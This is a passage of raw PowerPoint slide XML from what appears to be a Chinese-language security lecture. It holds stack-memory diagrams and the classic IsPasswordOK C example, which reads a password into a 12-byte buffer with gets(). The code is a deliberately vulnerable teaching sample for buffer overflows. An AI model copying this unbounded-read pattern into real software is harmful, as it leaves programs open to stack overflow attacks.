            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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17" name="Rectangle 84"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3408" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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18" name="Rectangle 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3648" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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19" name="Rectangle 86"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3888" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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20" name="Rectangle 87"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4128" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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21" name="Rectangle 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4368" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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22" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4608" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33823" name="Group 90"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="3120"/>
              <a:ext cx="3840" cy="240"/>
              <a:chOff x="1008" y="2448"/>
              <a:chExt cx="3840" cy="240"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33839" name="Rectangle 91"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1008" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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40" name="Rectangle 92"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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41" name="Rectangle 93"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1488" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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42" name="Rectangle 94"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1728" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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43" name="Rectangle 95"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1968" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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44" name="Rectangle 96"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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45" name="Rectangle 97"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2448" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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46" name="Rectangle 98"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2688" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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47" name="Rectangle 99"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2928" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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48" name="Rectangle 100"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3168" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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49" name="Rectangle 101"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3408" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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50" name="Rectangle 102"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3648" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>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51" name="Rectangle 103"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3888" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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52" name="Rectangle 104"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4128" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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53" name="Rectangle 105"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4368" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="28575">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN">
                  <a:cs typeface="宋体" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33854" name="Rectangle 106"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4608" y="2448"/>
                <a:ext cx="240" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="28575">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN">
                  <a:cs typeface="宋体" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33824" name="Line 107"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1364" y="2686"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33825" name="Line 108"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1604" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33826" name="Line 109"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1847" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33827" name="Line 110"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2092" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33828" name="Line 111"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2329" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33829" name="Line 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2577" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33830" name="Line 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2822" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33831" name="Line 114"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3049" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33832" name="Line 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3297" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33833" name="Line 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3537" y="2690"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33834" name="Line 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3777" y="2690"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33835" name="Line 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4022" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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33836" name="Line 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4249" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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33837" name="Line 120"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4489" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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33838" name="Line 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4734" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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 name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3842684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b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>IsPasswordOK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>程序实例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="2060848"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>IsPasswordOK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> Password[12]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> gets(Password);    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Get input from keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(Password,"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>goodpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>")) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>// Password Good</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
